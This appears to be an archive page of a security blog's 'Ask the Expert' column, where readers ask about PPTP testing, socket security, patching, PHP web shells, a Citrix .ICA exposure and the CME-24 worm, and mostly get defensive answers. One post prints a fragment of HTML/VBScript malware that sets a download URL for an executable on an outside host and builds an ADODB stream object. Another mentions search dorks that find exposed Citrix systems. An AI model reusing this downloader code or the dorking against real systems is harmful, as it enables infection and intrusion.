Posted on April 17th, 2008 by noam
Filed under: Ask the Expert, Corporate Security | 3 Comments »
Once again – another security question from our readers to the security experts who read this blog:
I ran across your site looking for information regarding the security of PPTP. I then found the PPTP bruter program from THC. I am a small business owner. I am a VAR (value added reseller) of POS (point of sale) equipment. My POS equipment is usually windows PC’s running POS software. I install a SOHO router that is also a PPTP endpoint so I can VPN in and remotely administrator my clients systems.
I’m trying to find out how easy it would be for someone to hack my PPTP endpoint. Can you help me figure out how to test my router?
Posted on March 7th, 2008 by expert
Filed under: Ask the Expert | 3 Comments »
A new question for you guys – you have been great answering the previous one:
Hi I’m a bit new to java and socket programming.
Anyway I just wrote a client server socket program and I have an open port listening on my unix box.
I was told that this is vulnerable because now anyone could write a client side program to my open port and send in whatever command line they want.
I am not sure where to go about researching what security measures I need to put in place for socket programming.
Posted on February 27th, 2008 by expert
Filed under: Ask the Expert | 8 Comments »
I am a Network Engineer at the University of Anonymous. I’m not sure if this is an irrelevant question, but here it is any way..
I want to have a Network Monitoring Software with the following characteristics
1 – I want to be able to monitor all the active workstations in each of the Labs.
2 – I want to have a list of trusted MAC addresses. I need this because I want to block any non-trusted device from accessing network resources. Exceptions might be given when the device is verified to be secure..
3 – I want to be able to detect any suspicious activities (pining, high traffic) and Block the associated IP address.
So please, tell me if there is any software of combination of software that enable me to do what I want..
I hope I will hear from you soon
Our readers have been very helpful to person who wrote the previous post, I believe our readers have the answer in this case as well, and as in the previous case, further, the combined answer was way better than anything we could have provided.
So I am going to let our readers answer this interesting question. Readers – what do you say?
Posted on February 12th, 2008 by expert
Filed under: Ask the Expert | 10 Comments »
I know that a restricted user is less vulnerable to most exploits but is knowing that your users have restricted access enough of a reason NOT to patch? I am advocating that my IT support team update/ patch the following software for our end users; QuickTime, Java, Adobe Reader and Acrobat. Currently all of our installed versions have multiple known vulnerabilities. I am being told patching is unnecessary because 95% of our users have restricted user rights and therefore cannot be exploited.
Will you please clarify? I understand how restricted user rights increases security, but is that enough of a layer to justify not patching. When I inquired about scanning thumb drives, this same answer is given, “It is not necessary because the users have restricted rights.” Many of our users have access to confidential and sensitive data and I remain concerned. I really appreciate any assistance that you can provide on this issue. Thank you for your help.
A: I am going to let our readers answer this interesting question. Readers – what do you say?
Posted on January 24th, 2008 by Administrator
Filed under: Ask the Expert | 18 Comments »
I have a webserver where i’ve found several different php shell scripts and I’d like to know how they got there. Are there known vulnerabilities that allow uploading of php files to a server?
I have several sites running on this server with several php script packages including…
Any ideas or pointers will be appreciated!
There are several vulnerabilities in both off the shelf products as well as custom PHP scripts that would allow “uploading”, in essence they don’t need to upload, they just need to get your PHP scripts to execute an arbitrary (outside) PHP script.
PHPbb has several:
Listed as Code Execution, Arbitrary File Upload, etc.
While zencart has just one problem:
But that could be misleading, and just mean that the software is very uncommon.
Posted on October 5th, 2007 by Juha-Matti
Filed under: Ask the Expert, Commentary, Corporate Security, Google, Web | 2 Comments »
Mr. Petko D. ‘Acrobat-Gmail’ Petkov has reported about very interesting Citrix issue:
When querying for public .ICA files (Independent Computing Architecture) you can do serious things in the remote system with this information. Opening Cmd.exe and listing the file system works etc. etc.
Report here and YouTube video of 1:28min here.
Googledork and Yahoodork(!) included, it appears there are many .mil and .gov sites. And hospitals too.
A real life example: A Finnish high school in Jyväskylä town fixed its problem in less than 20 minutes after receiving my e-mail this morning. Fine!
Posted on November 14th, 2006 by expert
Filed under: Ask the Expert, Microsoft, Virus | 10 Comments »
One of our customers have brought this HTML based malware to our attention:
on error resume next
‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”
‘ create adodbstream object
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
Set x = df.CreateObject(str,”")
Posted on March 30th, 2006 by expert
Filed under: Ask the Expert | 2 Comments »
We recently had two sites defaced on our servers, and the perpetrators are claiming to have used TCPDump. Is there a cheap way to encrypt the data packets to ensure they can’t be sniffed? … [snipped]
The easiest way to encrypt data between you and the server is to use SSL or SSH. If you are connecting to a web server, enable SSL encryption, if you are connecting to a service that can be protected by SSL, enable it.
If you can’t use SSL encryption in your product, you can use OpenSSH for tunneling of traffic to the destination host, or use OpenVPN (SSL based) to encrypt the connection between you and the destination host.
Posted on March 27th, 2006 by expert
Filed under: Ask the Expert | 1 Comment »
Hope you can help with this question.
If a computer is infected with CME 24 will it attempt to attack a mapped network drive?
Not just delivering its payload.
Lets first try to understand what CME 24 is, CME – Common Malware Enumeration – is a relatively new standard in the way malwares are identified and sorted.
CME allows different vendors, such as: Aladdin Knowledge Systems, Authentium, Avira, CA, ClamAV, ESET, Fortinet, Grisoft, H+BEDV, iDefense, Kaspersky, McAfee, Microsoft, TrojanDownloader, Norman, Panda, Sophos, Symantec, and Trend Micro to name the malware they identify in such a way that the user can know that the Malware ‘X’ that company A has found is the same Malware named ‘Y’ that company B finds.
CME 24, which is also been named by the different vendors as,
Aladdin Knowledge Systems: Win32.Blackmal.e
Destroy certain data files on an infected user’s machine on Friday, February 3, 2006.
According to our sources and independent analysis conducted on this worm, have revealed that the code should have destroyed. However, it is apparent that ITW (In the Wild) the worm’s payload does not function correctly making it unable to destroy content found on mapped drives.
Posted on November 9th, 2005 by expert
Filed under: Ask the Expert | 1 Comment »
I’m assessing the vulnerability of a web service application, and have been trying to find out whether this sort of scenario is possible, and if so, what to do about it.
Is there any sort of malware that could be installed on a user’s PC, such that it would intercept non-browser based HTTP requests (consisting of data to be PUT), send this data to a site run by the malware authors, and then issue the PUT to the intended web site? The effect being that the data is sent to the correct web site, but a copy is also sent to another location, unbeknownst to the user.
If this is possible, would HTTPS circumvent this?
I’ve searched and searched but cannot find anything addressing this.
What you are describing sounds like a Proxy server. In essence, proxies receive requests made by the user, send them to their original destination, receive the response from the destination and redirect that response to the user.
The use of a PUT requests to implement this is the first time I have heard of it, however it is not something that would be impossible to do.
For Proxy servers – HTTPS might trigger a warning on the part of the proxy as the certificate of the web site being accessed would be different from that of the proxy server from which you are receiving the HTTPS traffic back.
For Malware – As no traffic is being sent to the real destination, HTTPS or HTTP would make no difference. In both cases your traffic is being modified and possibly manipulated. Mozilla/IE might detect this manipulation and might not, I cannot be certain.